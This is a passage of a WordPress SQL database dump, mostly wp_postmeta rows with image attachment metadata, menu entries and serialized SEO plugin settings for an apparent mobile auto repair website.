eCommerce\'>Install</a>)</span></li></ul></div>", "no");

/* INSERT TABLE DATA: wp_postmeta */
INSERT INTO `wp_postmeta` VALUES("22", "14", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("23", "14", "_edit_lock", "1423364391:1");
INSERT INTO `wp_postmeta` VALUES("26", "25", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("27", "25", "_edit_lock", "1423242773:1");
INSERT INTO `wp_postmeta` VALUES("28", "27", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("29", "27", "_edit_lock", "1423284591:1");
INSERT INTO `wp_postmeta` VALUES("30", "37", "_wp_attached_file", "2015/02/The-Mobile-Mechanics.jpg");
INSERT INTO `wp_postmeta` VALUES("31", "37", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:935;s:6:\"height\";i:312;s:4:\"file\";s:32:\"2015/02/The-Mobile-Mechanics.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"The-Mobile-Mechanics-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"The-Mobile-Mechanics-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:30:\"The-Mobile-Mechanics-75x25.jpg\";s:5:\"width\";i:75;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("32", "37", "_wp_attachment_image_alt", "The Mobile Mechanics");
INSERT INTO `wp_postmeta` VALUES("33", "38", "_wp_attached_file", "2015/02/Mobile-Mechanic.jpg");
INSERT INTO `wp_postmeta` VALUES("34", "38", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:27:\"2015/02/Mobile-Mechanic.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Mobile-Mechanic-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Mobile-Mechanic-75x75.jpg\";s:5:\"width\";i:75;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("35", "41", "_wp_attached_file", "2015/02/Mobile-auto-maintenance.jpeg");
INSERT INTO `wp_postmeta` VALUES("36", "41", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:300;s:6:\"height\";i:220;s:4:\"file\";s:36:\"2015/02/Mobile-auto-maintenance.jpeg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"Mobile-auto-maintenance-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"Mobile-auto-maintenance-300x220.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:34:\"Mobile-auto-maintenance-75x55.jpeg\";s:5:\"width\";i:75;s:6:\"height\";i:55;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:34:\"Mobile auto repair and maintenance\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("37", "41", "_wp_attachment_image_alt", "Mobile auto repair and maintenance");
INSERT INTO `wp_postmeta` VALUES("38", "42", "_wp_attached_file", "2015/02/The-Mechanic-Logo-300x73.png");
INSERT INTO `wp_postmeta` VALUES("39", "42", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:300;s:6:\"height\";i:73;s:4:\"file\";s:36:\"2015/02/The-Mechanic-Logo-300x73.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"The-Mechanic-Logo-300x73-150x73.png\";s:5:\"width\";i:150;s:6:\"height\";i:73;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"The-Mechanic-Logo-300x73-300x73.png\";s:5:\"width\";i:300;s:6:\"height\";i:73;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:34:\"The-Mechanic-Logo-300x73-75x18.png\";s:5:\"width\";i:75;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("40", "43", "_wp_attached_file", "2015/02/mobile-mechanics-150x150.jpg");
INSERT INTO `wp_postmeta` VALUES("41", "43", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:36:\"2015/02/mobile-mechanics-150x150.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"mobile-mechanics-150x150-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:34:\"mobile-mechanics-150x150-75x75.jpg\";s:5:\"width\";i:75;s:6:\"height\";i:75;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("42", "45", "_wp_attached_file", "2015/02/Roadside-assistance.jpg");
INSERT INTO `wp_postmeta` VALUES("43", "45", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:221;s:6:\"height\";i:136;s:4:\"file\";s:31:\"2015/02/Roadside-assistance.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Roadside-assistance-150x136.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:136;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:29:\"Roadside-assistance-75x46.jpg\";s:5:\"width\";i:75;s:6:\"height\";i:46;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("44", "48", "_wp_attached_file", "2015/02/Mechanic-auto-repair.jpg");
INSERT INTO `wp_postmeta` VALUES("45", "48", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:300;s:6:\"height\";i:210;s:4:\"file\";s:32:\"2015/02/Mechanic-auto-repair.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Mechanic-auto-repair-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Mechanic-auto-repair-300x210.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:210;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Mechanic-auto-repair-75x53.jpg\";s:5:\"width\";i:75;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("46", "48", "_wp_attachment_image_alt", "Mechanic-auto-repair");
INSERT INTO `wp_postmeta` VALUES("49", "55", "papertemplate_template", "papertemplate");
INSERT INTO `wp_postmeta` VALUES("50", "56", "papertemplate_template", "papertemplate");
INSERT INTO `wp_postmeta` VALUES("51", "57", "papertemplate_template", "papertemplate");
INSERT INTO `wp_postmeta` VALUES("52", "58", "papertemplate_template", "papertemplate");
INSERT INTO `wp_postmeta` VALUES("53", "59", "papertemplate_template", "papertemplate");
INSERT INTO `wp_postmeta` VALUES("54", "55", "_edit_lock", "1423277738:1");
INSERT INTO `wp_postmeta` VALUES("55", "59", "_edit_lock", "1423277824:1");
INSERT INTO `wp_postmeta` VALUES("56", "59", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("57", "57", "_edit_lock", "1423277764:1");
INSERT INTO `wp_postmeta` VALUES("58", "71", "_wp_attached_file", "2015/02/mobile-auto-repair.jpg");
INSERT INTO `wp_postmeta` VALUES("59", "71", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:300;s:6:\"height\";i:199;s:4:\"file\";s:30:\"2015/02/mobile-auto-repair.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"mobile-auto-repair-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"mobile-auto-repair-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"single-post-thumbnail\";a:4:{s:4:\"file\";s:28:\"mobile-auto-repair-75x50.jpg\";s:5:\"width\";i:75;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:24:\"mobile auto repair tampa\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("60", "70", "_edit_last", "1");
INSERT INTO `wp_postmeta` VALUES("61", "70", "_edit_lock", "1423284562:1");
INSERT INTO `wp_postmeta` VALUES("62", "73", "_wp_attached_file", "2015/02/auto-repair-shops.jpg");
INSERT INTO `wp_postmeta` VALUES("63", "73", "_wp_attachment_metadata", "a:5:{s:5:\"width\";i:35;s:6:\"height\";i:34;s:4:\"file\";s:29:\"2015/02/auto-repair-shops.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:17:\"auto repair shops\";s:11:\"orientation\";i:0;}}");
INSERT INTO `wp_postmeta` VALUES("64", "84", "_menu_item_type", "post_type");
INSERT INTO `wp_postmeta` VALUES("65", "84", "_menu_item_menu_item_parent", "0");
INSERT INTO `wp_postmeta` VALUES("66", "84", "_menu_item_object_id", "59");
INSERT INTO `wp_postmeta` VALUES("67", "84", "_menu_item_object", "page");
INSERT INTO `wp_postmeta` VALUES("68", "84", "_menu_item_target", "");
INSERT INTO `wp_postmeta` VALUES("69", "84", "_menu_item_classes", "a:1:{i:0;s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("70", "84", "_menu_item_xfn", "");
INSERT INTO `wp_postmeta` VALUES("71", "84", "_menu_item_url", "");
INSERT INTO `wp_postmeta` VALUES("73", "85", "_menu_item_type", "post_type");
INSERT INTO `wp_postmeta` VALUES("74", "85", "_menu_item_menu_item_parent", "0");
INSERT INTO `wp_postmeta` VALUES("75", "85", "_menu_item_object_id", "58");
INSERT INTO `wp_postmeta` VALUES("76", "85", "_menu_item_object", "page");
INSERT INTO `wp_postmeta` VALUES("77", "85", "_menu_item_target", "");
INSERT INTO `wp_postmeta` VALUES("78", "85", "_menu_item_classes", "a:1:{i:0;s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("79", "85", "_menu_item_xfn", "");
INSERT INTO `wp_postmeta` VALUES("80", "85", "_menu_item_url", "");
INSERT INTO `wp_postmeta` VALUES("82", "86", "_menu_item_type", "post_type");
INSERT INTO `wp_postmeta` VALUES("83", "86", "_menu_item_menu_item_parent", "0");
INSERT INTO `wp_postmeta` VALUES("84", "86", "_menu_item_object_id", "57");
INSERT INTO `wp_postmeta` VALUES("85", "86", "_menu_item_object", "page");
INSERT INTO `wp_postmeta` VALUES("86", "86", "_menu_item_target", "");
INSERT INTO `wp_postmeta` VALUES("87", "86", "_menu_item_classes", "a:1:{i:0;s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("88", "86", "_menu_item_xfn", "");
INSERT INTO `wp_postmeta` VALUES("89", "86", "_menu_item_url", "");
INSERT INTO `wp_postmeta` VALUES("91", "87", "_menu_item_type", "post_type");
INSERT INTO `wp_postmeta` VALUES("92", "87", "_menu_item_menu_item_parent", "0");
INSERT INTO `wp_postmeta` VALUES("93", "87", "_menu_item_object_id", "56");
INSERT INTO `wp_postmeta` VALUES("94", "87", "_menu_item_object", "page");
INSERT INTO `wp_postmeta` VALUES("95", "87", "_menu_item_target", "");
INSERT INTO `wp_postmeta` VALUES("96", "87", "_menu_item_classes", "a:1:{i:0;s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("97", "87", "_menu_item_xfn", "");
INSERT INTO `wp_postmeta` VALUES("98", "87", "_menu_item_url", "");
INSERT INTO `wp_postmeta` VALUES("100", "88", "_menu_item_type", "post_type");
INSERT INTO `wp_postmeta` VALUES("101", "88", "_menu_item_menu_item_parent", "0");
INSERT INTO `wp_postmeta` VALUES("102", "88", "_menu_item_object_id", "55");
INSERT INTO `wp_postmeta` VALUES("103", "88", "_menu_item_object", "page");
INSERT INTO `wp_postmeta` VALUES("104", "88", "_menu_item_target", "");
INSERT INTO `wp_postmeta` VALUES("105", "88", "_menu_item_classes", "a:1:{i:0;s:0:\"\";}");
INSERT INTO `wp_postmeta` VALUES("106", "88", "_menu_item_xfn", "");
INSERT INTO `wp_postmeta` VALUES("107", "88", "_menu_item_url", "");
INSERT INTO `wp_postmeta` VALUES("109", "14", "onpageseo_post_meta_data", "a:2:{s:18:\"mobile auto repair\";a:36:{s:7:\"Keyword\";s:18:\"mobile auto repair\";s:9:\"Permalink\";i:0;s:12:\"KeywordTitle\";s:1:\"1\";s:21:\"KeywordTitleBeginning\";i:0;s:18:\"KeywordTitleEnding\";i:1;s:21:\"KeywordTitleInstances\";i:1;s:10:\"TitleWords\";i:1;s:15:\"TitleWordsTotal\";i:7;s:15:\"TitleCharsTotal\";i:41;s:10:\"TitleChars\";i:1;s:18:\"DescriptionMetaTag\";i:0;s:24:\"DescriptionMetaTagLength\";s:1:\"0\";s:27:\"DescriptionMetaTagBeginning\";i:0;s:15:\"KeywordsMetaTag\";i:0;s:11:\"TwitterCard\";s:0:\"\";s:9:\"OpenGraph\";s:0:\"\";s:10:\"DublinCore\";s:0:\"\";s:15:\"GooglePublisher\";i:0;s:12:\"GoogleAuthor\";i:0;s:9:\"PostWords\";i:1;s:19:\"KeywordDensityScore\";s:4:\"0.44\";s:14:\"KeywordDensity\";i:0;s:13:\"First100Words\";i:1;s:12:\"Last100Words\";i:0;s:18:\"ExternalAnchorText\";i:0;s:18:\"InternalAnchorText\";i:1;s:2:\"H1\";i:0;s:11:\"H1Beginning\";i:0;s:7:\"H1Total\";i:0;s:2:\"H2\";i:1;s:2:\"H3\";i:0;s:8:\"ImageALT\";i:0;s:4:\"Bold\";i:1;s:6:\"Italic\";i:1;s:9:\"Underline\";i:0;s:10:\"TotalScore\";s:5:\"34.62\";}s:25:\"onpageseo_global_settings\";a:17:{s:11:\"MainKeyword\";s:18:\"mobile auto repair\";s:17:\"SecondaryKeywords\";s:0:\"\";s:6:\"PostID\";i:14;s:3:\"URL\";s:62:\"http://tallahassee.themobilemechanics.org/auto-repair-service/\";s:10:\"FleschEase\";d:66.099999999999994315658113919198513031005859375;s:11:\"FleschLevel\";s:8:\"Standard\";s:16:\"FleschGradeLevel\";d:9;s:15:\"GunningFogScore\";d:11.5;s:16:\"ColemanLiauIndex\";d:8.9000000000000003552713678800500929355621337890625;s:9:\"SMOGIndex\";d:8.800000000000000710542735760100185871124267578125;s:25:\"AutomatedReadabilityIndex\";d:8.4000000000000003552713678800500929355621337890625;s:13:\"SentenceCount\";i:23;s:9:\"WordCount\";i:454;s:23:\"AverageWordsPerSentence\";s:5:\"20.09\";s:23:\"AverageSyllablesPerWord\";s:4:\"1.42\";s:18:\"ComplexWordsNumber\";i:52;s:22:\"ComplexWordsPercentage\";s:5:\"11.26\";}}");
INSERT INTO `wp_postmeta` VALUES("110", "14", "_onpageseo_post_settings", "a:4:{s:7:\"twitter\";a:31:{s:30:\"opseosetting-twitter-card-type\";s:7:\"summary\";s:31:\"opseosetting-twitter-title-text\";s:0:\"\";s:41:\"opseosetting-twitter-description-textarea\";s:0:\"\";s:30:\"opseosetting-twitter-site-text\";s:0:\"\";s:33:\"opseosetting-twitter-creator-text\";s:0:\"\";s:33:\"opseosetting-twitter-image-1-text\";s:0:\"\";s:33:\"opseosetting-twitter-image-2-text\";s:0:\"\";s:33:\"opseosetting-twitter-image-3-text\";s:0:\"\";s:33:\"opseosetting-twitter-image-4-text\";s:0:\"\";s:32:\"opseosetting-twitter-image-width\";s:0:\"\";s:33:\"opseosetting-twitter-image-height\";s:0:\"\";s:40:\"opseosetting-twitter-large-image-summary\";s:0:\"\";s:41:\"opseosetting-twitter-iphone-app-name-text\";s:0:\"\";s:39:\"opseosetting-twitter-iphone-app-id-text\";s:0:\"\";s:40:\"opseosetting-twitter-iphone-app-url-text\";s:0:\"\";s:39:\"opseosetting-twitter-ipad-app-name-text\";s:0:\"\";s:37:\"opseosetting-twitter-ipad-app-id-text\";s:0:\"\";s:38:\"opseosetting-twitter-ipad-app-url-text\";s:0:\"\";s:45:\"opseosetting-twitter-googleplay-app-name-text\";s:0:\"\";s:43:\"opseosetting-twitter-googleplay-app-id-text\";s:0:\"\";s:44:\"opseosetting-twitter-googleplay-app-url-text\";s:0:\"\";s:32:\"opseosetting-twitter-player-text\";s:0:\"\";s:33:\"opseosetting-twitter-player-width\";s:0:\"\";s:34:\"opseosetting-twitter-player-height\";s:0:\"\";s:38:\"opseosetting-twitter-image-player-text\";s:0:\"\";s:32:\"opseosetting-twitter-stream-text\";s:0:\"\";s:45:\"opseosetting-twitter-stream-content-type-text\";s:0:\"\";s:28:\"opseosetting-twitter-label-1\";s:0:\"\";s:27:\"opseosetting-twitter-data-1\";s:0:\"\";s:28:\"opseosetting-twitter-label-2\";s:0:\"\";s:27:\"opseosetting-twitter-data-2\";s:0:\"\";}s:10:\"dublincore\";a:6:{s:34:\"opseosetting-dublincore-title-text\";s:0:\"\";s:44:\"opseosetting-dublincore-description-textarea\";s:0:\"\";s:40:\"opseosetting-dublincore-subject-textarea\";s:0:\"\";s:36:\"opseosetting-dublincore-creator-text\";s:0:\"\";s:38:\"opseosetting-dublincore-publisher-text\";s:0:\"\";s:33:\"opseosetting-dublincore-type-text\";s:4:\"Text\";}s:9:\"opengraph\";a:51:{s:27:\"opseosetting-opengraph-type\";s:7:\"article\";s:33:\"opseosetting-opengraph-title-text\";s:0:\"\";s:43:\"opseosetting-opengraph-description-textarea\";s:0:\"\";s:36:\"opseosetting-opengraph-sitename-text\";s:0:\"\";s:35:\"opseosetting-opengraph-image-1-text\";s:0:\"\";s:34:\"opseosetting-opengraph-image-width\";s:0:\"\";s:35:\"opseosetting-opengraph-image-height\";s:0:\"\";s:33:\"opseosetting-opengraph-video-text\";s:0:\"\";s:33:\"opseosetting-opengraph-audio-text\";s:0:\"\";s:45:\"opseosetting-opengraph-facebook-admin-id-text\";s:0:\"\";s:43:\"opseosetting-opengraph-facebook-app-id-text\";s:0:\"\";s:42:\"opseosetting-opengraph-article-author-text\";s:0:\"\";s:45:\"opseosetting-opengraph-article-publisher-text\";s:0:\"\";s:43:\"opseosetting-opengraph-article-section-text\";s:0:\"\";s:44:\"opseosetting-opengraph-article-tags-textarea\";s:0:\"\";s:39:\"opseosetting-opengraph-book-author-text\";s:0:\"\";s:37:\"opseosetting-opengraph-book-isbn-text\";s:0:\"\";s:47:\"opseosetting-opengraph-book-published-date-text\";s:0:\"\";s:41:\"opseosetting-opengraph-book-tags-textarea\";s:0:\"\";s:38:\"opseosetting-opengraph-video-type-text\";s:5:\"movie\";s:39:\"opseosetting-opengraph-video-actor-text\";s:0:\"\";s:44:\"opseosetting-opengraph-video-actor-role-text\";s:0:\"\";s:42:\"opseosetting-opengraph-video-director-text\";s:0:\"\";s:40:\"opseosetting-opengraph-video-writer-text\";s:0:\"\";s:42:\"opseosetting-opengraph-video-duration-text\";s:0:\"\";s:48:\"opseosetting-opengraph-video-published-date-text\";s:0:\"\";s:42:\"opseosetting-opengraph-video-tags-textarea\";s:0:\"\";s:40:\"opseosetting-opengraph-video-series-text\";s:0:\"\";s:38:\"opseosetting-opengraph-music-type-text\";s:4:\"song\";s:44:\"opseosetting-opengraph-music-song-album-text\";s:0:\"\";s:47:\"opseosetting-opengraph-music-song-musician-text\";s:0:\"\";s:47:\"opseosetting-opengraph-music-song-duration-text\";s:0:\"\";s:43:\"opseosetting-opengraph-music-song-disc-text\";s:0:\"\";s:44:\"opseosetting-opengraph-music-song-track-text\";s:0:\"\";s:51:\"opseosetting-opengraph-music-song-release-type-text\";s:0:\"\";s:48:\"opseosetting-opengraph-music-album-musician-text\";s:0:\"\";s:44:\"opseosetting-opengraph-music-album-song-text\";s:0:\"\";s:48:\"opseosetting-opengraph-music-album-duration-text\";s:0:\"\";s:44:\"opseosetting-opengraph-music-album-disc-text\";s:0:\"\";s:45:\"opseosetting-opengraph-music-album-track-text\";s:0:\"\";s:52:\"opseosetting-opengraph-music-album-release-type-text\";s:0:\"\";s:48:\"opseosetting-opengraph-music-published-date-text\";s:0:\"\";s:47:\"opseosetting-opengraph-music-playlist-song-text\";s:0:\"\";s:50:\"opseosetting-opengraph-music-playlist-creator-text\";s:0:\"\";s:54:\"opseosetting-opengraph-music-radiostation-creator-text\";s:0:\"\";s:45:\"opseosetting-opengraph-profile-firstname-text\";s:0:\"\";s:44:\"opseosetting-opengraph-profile-lastname-text\";s:0:\"\";s:42:\"opseosetting-opengraph-profile-gender-text\";s:0:\"\";s:44:\"opseosetting-opengraph-profile-username-text\";s:0:\"\";s:47:\"opseosetting-opengraph-profile-facebook-id-text\";s:0:\"\";s:47:\"opseosetting-opengraph-website-facebook-id-text\";s:0:\"\";}s:12:\"richsnippets\";a:141:{s:30:\"opseosetting-richsnippets-type\";s:6:\"review\";s:50:\"opseosetting-richsnippets-review-itemreviewed-text\";s:0:\"\";s:42:\"opseosetting-richsnippets-review-name-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-review-image-1-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-review-summary-text\";s:0:\"\";s:53:\"opseosetting-richsnippets-review-description-textarea\";s:0:\"\";s:46:\"opseosetting-richsnippets-review-rating-select\";s:0:\"\";s:42:\"opseosetting-richsnippets-person-name-text\";s:0:\"\";s:45:\"opseosetting-richsnippets-person-image-1-text\";s:0:\"\";s:51:\"opseosetting-richsnippets-person-streetaddress-text\";s:0:\"\";s:42:\"opseosetting-richsnippets-person-city-text\";s:0:\"\";s:43:\"opseosetting-richsnippets-person-state-text\";s:0:\"\";s:48:\"opseosetting-richsnippets-person-postalcode-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-person-country-select\";s:0:\"\";s:47:\"opseosetting-richsnippets-person-job-title-text\";s:0:\"\";s:46:\"opseosetting-richsnippets-person-gender-select\";s:0:\"\";s:47:\"opseosetting-richsnippets-person-telephone-text\";s:0:\"\";s:41:\"opseosetting-richsnippets-person-fax-text\";s:0:\"\";s:43:\"opseosetting-richsnippets-person-email-text\";s:0:\"\";s:41:\"opseosetting-richsnippets-person-url-text\";s:0:\"\";s:53:\"opseosetting-richsnippets-person-description-textarea\";s:0:\"\";s:43:\"opseosetting-richsnippets-product-name-text\";s:0:\"\";s:46:\"opseosetting-richsnippets-product-image-1-text\";s:0:\"\";s:42:\"opseosetting-richsnippets-product-url-text\";s:0:\"\";s:51:\"opseosetting-richsnippets-product-manufacturer-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-product-brand-text\";s:0:\"\";s:48:\"opseosetting-richsnippets-product-productid-text\";s:0:\"\";s:42:\"opseosetting-richsnippets-product-sku-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-product-category-text\";s:0:\"\";s:50:\"opseosetting-richsnippets-product-condition-select\";s:0:\"\";s:53:\"opseosetting-richsnippets-product-availability-select\";s:0:\"\";s:50:\"opseosetting-richsnippets-product-releasedate-text\";s:0:\"\";s:44:\"opseosetting-richsnippets-product-price-text\";s:0:\"\";s:49:\"opseosetting-richsnippets-product-currency-select\";s:0:\"\";s:54:\"opseosetting-richsnippets-product-description-textarea\";s:0:\"\";s:47:\"opseosetting-richsnippets-product-rating-select\";s:0:\"\";s:46:\"opseosetting-richsnippets-product-reviews-text\";s:0:\"\";s:49:\"opseosetting-richsnippets-localbusiness-name-text\";s:0:\"\";s:52:\"opseosetting-richsnippets-localbusiness-image-1-text\";s:0:\"\";s:48:\"opseosetting-richsnippets-localbusiness-url-text\";s:0:\"\";s:51:\"opseosetting-richsnippets-localbusiness-type-select\";s:0:\"\";s:60:\"opseosetting-richsnippets-localbusiness-description-textarea\";s:0:\"\";s:52:\"opseosetting-richsnippets-localbusiness-address-text\";s:0:\"\";s:49:\"opseosetting-richsnippets-localbusiness-city-text\";s:0:\"\";s:50:\"opseosetting-richsnippets-localbusiness-state-text\";s:0:\"\";s:55:\"opseosetting-richsnippets-localbusiness-postalcode-text\";s:0:\"\";s:54:\"opseosetting-richsnippets-localbusiness-country-select\";s:0:\"\";s:54:\"opseosetting-richsnippets-localbusiness-telephone-text\";s:0:\"\";s:48:\"opseosetting-richsnippets-localbusiness-fax-text\";s:0:\"\";s:50:\"opseosetting-richsnippets-localbusiness-email-text\";s:0:\"\";s:60:\"opseosetting-richsnippets-localbusiness-paymentaccepted-text\";s:0:\"\";s:55:\"opseosetting-richsnippets-localbusiness-pricerange-text\";s:0:\"\";s:61:\"opseosetting-richsnippets-localbusiness-openinghours-textarea\";s:0:\"\";s:48:\"opseosetting-richsnippets-organization-name-text\";s:0:\"\";s:51:\"opseosetting-richsnippets-organization-image-1-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-organization-url-text\";s:0:\"\";s:50:\"opseosetting-richsnippets-organization-type-select\";s:0:\"\";s:59:\"opseosetting-richsnippets-organization-description-textarea\";s:0:\"\";s:51:\"opseosetting-richsnippets-organization-address-text\";s:0:\"\";s:48:\"opseosetting-richsnippets-organization-city-text\";s:0:\"\";s:49:\"opseosetting-richsnippets-organization-state-text\";s:0:\"\";s:54:\"opseosetting-richsnippets-organization-postalcode-text\";s:0:\"\";s:53:\"opseosetting-richsnippets-organization-country-select\";s:0:\"\";s:53:\"opseosetting-richsnippets-organization-telephone-text\";s:0:\"\";s:47:\"opseosetting-richsnippets-organization-fax-text\";s: